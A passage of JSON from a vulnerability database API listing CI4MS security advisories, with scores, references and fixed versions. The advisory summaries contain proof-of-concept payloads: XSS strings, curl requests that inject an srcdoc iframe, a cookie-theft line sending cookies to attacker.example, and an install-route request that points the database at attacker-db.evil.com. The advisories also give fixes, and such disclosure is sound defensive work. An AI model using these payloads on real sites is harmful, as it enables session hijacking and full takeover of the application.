                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gcfj-cf7j-vwgj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gcfj-cf7j-vwgj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34561",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34561"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gcfj-cf7j-vwgj",
                    "reference_id": "GHSA-gcfj-cf7j-vwgj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gcfj-cf7j-vwgj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34561",
                "GHSA-gcfj-cf7j-vwgj"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ja8-6jec-nqg3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89480?format=api",
            "vulnerability_id": "VCID-avc6-vkdy-kbgb",
            "summary": "CI4MS: Blogs Categories Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Blog Category Title (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Blog Category Title in Blog Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side.\n\nThis stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces, and blog post views without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog category creation functionality\n- Blog category editing functionality\n- Blog category storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog category title to include a malicious XSS payload.\n- The application stores this value without sanitization or encoding.\n- The payload persists and executes whenever the category title is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/blogs/categories/`\n- `/blog/{id}`\n\n## Steps To Reproduce (POC)\n1. Go to the Blog Categories management page\n2. Create or edit a category and insert an XSS payload into the category title such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the category\n4. View a public blog category page, blog post page, or the administrative interface\n5. Notice the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/GAFC3AJY#3LHyuyl7I7921UEeA-JlUYdckh6zGLCTy-6w9BNzSmQ",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15872",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15923",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18292",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34569"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:04:54Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fhrf-q333-82fm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:04:54Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fhrf-q333-82fm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34569"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fhrf-q333-82fm",
                    "reference_id": "GHSA-fhrf-q333-82fm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fhrf-q333-82fm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34569",
                "GHSA-fhrf-q333-82fm"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-avc6-vkdy-kbgb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90091?format=api",
            "vulnerability_id": "VCID-c1ux-y4qk-xfch",
            "summary": "CI4MS has stored XSS via srcdoc attribute bypass in Google Maps iframe setting\n## Summary\n\nThe Google Maps iframe setting (`cMap` field) in `compInfosPost()` sanitizes input using `strip_tags()` with an `<iframe>` allowlist and regex-based removal of `on\\w+` event handlers. However, the `srcdoc` attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an `<iframe srcdoc=\"...\">` payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors.\n\n## Details\n\n**Input sanitization** (`modules/Settings/Controllers/Settings.php:49-53`):\n\n```php\n$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));\n$mapValue = preg_replace('/\\bon\\w+\\s*=\\s*\"[^\"]*\"/i', '', $mapValue);\n$mapValue = preg_replace('/\\bon\\w+\\s*=\\s*\\'[^\\']*\\'/i', '', $mapValue);\n$mapValue = preg_replace('/\\bon\\w+\\s*=\\s*[^\\s>]+/i', '', $mapValue);\nsetting()->set('Gmap.map_iframe', $mapValue);\n```\n\nThe three regex patterns only match attributes beginning with `on` (e.g., `onclick`, `onerror`). The `srcdoc` attribute does not begin with `on` and passes through untouched.\n\n**Output rendering** (`app/Views/templates/default/gmapiframe.php:3`):\n\n```php\n<?php echo strip_tags($settings->map_iframe,'<iframe>') ?>\n```\n\nThe output applies `strip_tags` with the same `<iframe>` allowlist but performs no attribute filtering or HTML encoding. The stored payload is rendered verbatim.\n\n**Why HTML entities bypass `strip_tags`**: A payload like `<iframe srcdoc=\"&lt;script&gt;alert(1)&lt;/script&gt;\">` contains only one tag (`<iframe>`), which is in the allowlist. The entity-encoded content (`&lt;script&gt;`) is not recognized as a tag by `strip_tags`. However, when the browser renders the `srcdoc` attribute, it decodes the HTML entities and creates a new browsing context containing `<script>alert(1)</script>`.\n\n**Why this is same-origin**: Per the HTML specification, an `<iframe srcdoc=\"...\">` without a `sandbox` attribute inherits the parent document's origin. The injected script has full access to the parent page's cookies, DOM, and session.\n\n## PoC\n\n**Prerequisites**: Authenticated admin session with `update` role on the Settings module.\n\n**Step 1: Inject the payload**\n\n```bash\ncurl -X POST 'https://target/backend/settings/compInfos' \\\n  -H 'Cookie: ci_session=ADMIN_SESSION_ID' \\\n  -d 'cName=TestCo&cAddress=123+Main+St&cPhone=1234567890&cMail=admin@example.com&cMap=%3Ciframe+srcdoc%3D%22%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B%2Fscript%26gt%3B%22%3E%3C%2Fiframe%3E'\n```\n\nThe `cMap` value decodes to:\n```html\n<iframe srcdoc=\"&lt;script&gt;alert(document.domain)&lt;/script&gt;\"></iframe>\n```\n\n**Step 2: Visit any public page that includes the Google Maps widget**\n\nNavigate to the frontend contact or footer page as an unauthenticated visitor. The browser renders the `srcdoc` iframe, decodes the entities, and executes the script in the parent page's origin.\n\n**Expected result**: JavaScript `alert(document.domain)` fires showing the target's domain, confirming same-origin execution.\n\n**Cookie theft variant**:\n```\n<iframe srcdoc=\"&lt;script&gt;document.location='https://attacker.example/steal?c='+document.cookie&lt;/script&gt;\"></iframe>\n```\n\n## Impact\n\n- **Stored XSS affecting all frontend visitors**: The payload persists in the settings database and executes for every unauthenticated visitor viewing pages that include the Google Maps iframe widget.\n- **Session hijacking**: The script executes in the parent page's origin, giving access to session cookies (unless HttpOnly is set) and the full DOM.\n- **Credential theft**: An attacker can inject a fake login form or redirect users to a phishing page.\n- **Scope change**: The attack crosses from the admin backend trust boundary to the public frontend, affecting users who have no relationship with the backend.\n\nThe attack requires a compromised or malicious admin account with settings update permission. While this is a privileged starting point (PR:H), the impact crosses to all unauthenticated visitors (S:C), justifying Medium severity.\n\n## Recommended Fix\n\nReplace the regex-based attribute blocklist with a strict allowlist approach. Only allow `src`, `width`, `height`, `frameborder`, `style`, `allowfullscreen`, and `loading` attributes on iframe tags:\n\n```php\n// In modules/Settings/Controllers/Settings.php, replace lines 49-52:\n$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));\n// Strip all attributes except safe ones for iframes\n$mapValue = preg_replace_callback(\n    '/<iframe\\s+([^>]*)>/i',\n    function ($matches) {\n        $allowedAttrs = ['src', 'width', 'height', 'frameborder', 'style', 'allowfullscreen', 'loading', 'title'];\n        preg_match_all('/(\\w+)\\s*=\\s*(?:\"([^\"]*)\"|\\'([^\\']*)\\'|(\\S+))/i', $matches[1], $attrs, PREG_SET_ORDER);\n        $safe = '';\n        foreach ($attrs as $attr) {\n            $name = strtolower($attr[1]);\n            $value = $attr[2] ?: $attr[3] ?: $attr[4];\n            if (in_array($name, $allowedAttrs, true)) {\n                // For src, only allow https URLs (block javascript: etc.)\n                if ($name === 'src' && !preg_match('#^https://#i', $value)) {\n                    continue;\n                }\n                $safe .= ' ' . $name . '=\"' . esc($value) . '\"';\n            }\n        }\n        return '<iframe' . $safe . '>';\n    },\n    $mapValue\n);\n```\n\nThis allowlist approach ensures that dangerous attributes like `srcdoc`, `src` with `javascript:` protocol, and any future dangerous attributes are blocked by default.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39390",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01339",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01337",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01343",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39390"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:09:31Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39390",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39390"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x3hr-cp7x-44r2",
                    "reference_id": "GHSA-x3hr-cp7x-44r2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x3hr-cp7x-44r2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-39390",
                "GHSA-x3hr-cp7x-44r2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c1ux-y4qk-xfch"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89189?format=api",
            "vulnerability_id": "VCID-e9xp-rar3-c7bp",
            "summary": "CI4MS Vulnerable to Post-Installation Re-entry via Cache-Dependent Install Guard Bypass\n## Summary\n\nThe install route guard in ci4ms relies solely on a volatile cache check (`cache('settings')`) combined with `.env` file existence to block post-installation access to the setup wizard. When the database is temporarily unreachable during a cache miss (TTL expiry or admin-triggered cache clear), the guard fails open, allowing an unauthenticated attacker to overwrite the `.env` file with attacker-controlled database credentials, achieving full application takeover.\n\n## Details\n\nThe `InstallFilter::before()` method at `modules/Install/Filters/InstallFilter.php:13` implements the install guard:\n\n```php\npublic function before(RequestInterface $request, $arguments = null)\n{\n    if (file_exists(ROOTPATH . '.env') && !empty(cache('settings'))) return show_404();\n}\n```\n\nThis requires **both** conditions — `.env` existence AND non-empty cache — to block access. The cache population happens in `app/Config/Filters.php:128-151` during the Filters constructor, which runs before route-specific filters:\n\n```php\npublic function __construct()\n{\n    parent::__construct();\n    if (is_file(ROOTPATH . '.env')) {\n        try {\n            $this->commonModel = new CommonModel();\n            if (empty(cache('settings')) && $this->commonModel->db->tableExists('settings')) {\n                $this->settings = $this->commonModel->lists('settings');\n                // ... populate cache ...\n                cache()->save('settings', $set, 86400); // 24h TTL\n            }\n        } catch (\\Throwable $e) {\n            $this->settings = (object)[]; // Silently swallow ALL exceptions\n        }\n    }\n```\n\nWhen the database is unreachable (connection failure, timeout, maintenance), the `\\Throwable` catch at line 148-150 silently swallows the exception. The cache remains empty, and `InstallFilter::before()` sees `empty(cache('settings'))` as true, allowing the request through.\n\nThe install controller at `modules/Install/Controllers/Install.php:10-87` then processes the POST:\n\n1. The `host` parameter at line 35 is **not present in the validation rules** (`$valData`, lines 13-27) — it is written directly from `$this->request->getPost('host')` to `.env` with zero validation\n2. `copyEnvFile()` (line 70) overwrites the existing `.env` by copying from the `env` template\n3. `updateEnvSettings()` (line 70) writes attacker-controlled values including database hostname\n4. No database connection is needed — the `index()` action only performs filesystem operations\n\nAdditionally, CSRF protection is explicitly disabled for all install routes in `modules/Install/Config/InstallConfig.php:7-10`:\n\n```php\npublic $csrfExcept = [\n    'install',\n    'install/*'\n];\n```\n\nThe cache has a 24-hour TTL (`Filters.php:143`), and `cache()->delete('settings')` is called in 14+ locations across admin controllers (Settings, Blog, Backup, AJAX, Pages), creating recurring windows where the cache is empty and must be repopulated from the database.\n\n## PoC\n\n**Prerequisites:** The target database must be temporarily unreachable (maintenance window, connection exhaustion, network partition) at a moment when the `settings` cache has expired or been cleared.\n\n```bash\n# Step 1: Verify the install route is accessible (DB outage + cache miss)\ncurl -s -o /dev/null -w \"%{http_code}\" http://target/install\n# Expected: 200 (instead of 404)\n\n# Step 2: Overwrite .env with attacker-controlled database credentials\ncurl -X POST http://target/install \\\n  -d 'baseUrl=http://target/' \\\n  -d 'host=attacker-db.evil.com' \\\n  -d 'dbname=ci4ms' \\\n  -d 'dbusername=root' \\\n  -d 'dbpassword=pass' \\\n  -d 'dbdriver=MySQLi' \\\n  -d 'dbpre=' \\\n  -d 'dbport=3306' \\\n  -d 'name=Admin' \\\n  -d 'surname=Evil' \\\n  -d 'username=admin' \\\n  -d 'password=Evil1234!' \\\n  -d 'email=evil@attacker.com' \\\n  -d 'siteName=Pwned'\n# No CSRF token required (CSRF exempt for install routes)\n# .env is now overwritten with attacker's DB hostname\n\n# Step 3: Follow redirect to /install/dbsetup\n# This runs migrations on the attacker-controlled database and creates an admin account\n# The application now connects to attacker's database = full takeover\n```\n\n## Impact\n\nWhen exploited during a database outage coinciding with cache expiry:\n\n- **Full application takeover**: The `.env` file is overwritten with attacker-controlled database credentials, redirecting all application database queries to an attacker-controlled server\n- **Credential theft**: All subsequent user logins, form submissions, and API calls send data to the attacker's database\n- **Data integrity loss**: The attacker controls what data the application reads from the database, enabling arbitrary content injection, phishing, and privilege escalation\n- **Encryption key reset**: `generateEncryptionKey()` is called (line 70), invalidating all existing encrypted data and sessions\n\nThe attack requires no authentication, no CSRF token, and no user interaction. The exploitability window recurs every 24 hours at cache TTL expiry and after any admin action that clears the settings cache, but is only exploitable when the database is simultaneously unreachable.\n\n## Recommended Fix\n\nReplace the volatile cache-based install guard with a persistent filesystem lock:\n\n```php\n// modules/Install/Filters/InstallFilter.php\nclass InstallFilter implements FilterInterface\n{\n    public function before(RequestInterface $request, $arguments = null)\n    {\n        // Use a persistent filesystem lock instead of volatile cache\n        if (file_exists(WRITEPATH . 'installed.lock')) {\n            return show_404();\n        }\n    }\n}\n```\n\nCreate the lock file at the end of successful installation in `Install::dbsetup()`:\n\n```php\n// At the end of dbsetup(), after successful migration and setup:\nfile_put_contents(WRITEPATH . 'installed.lock', date('Y-m-d H:i:s'));\n```\n\nAdditionally, add validation for the `host` parameter in `Install::index()`:\n\n```php\n$valData['host'] = [\n    'label' => lang('Install.databaseHost'),\n    'rules' => 'required|max_length[255]|regex_match[/^[a-zA-Z0-9._-]+$/]'\n];\n```",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39393",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16983",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16863",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16945",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16979",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39393"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
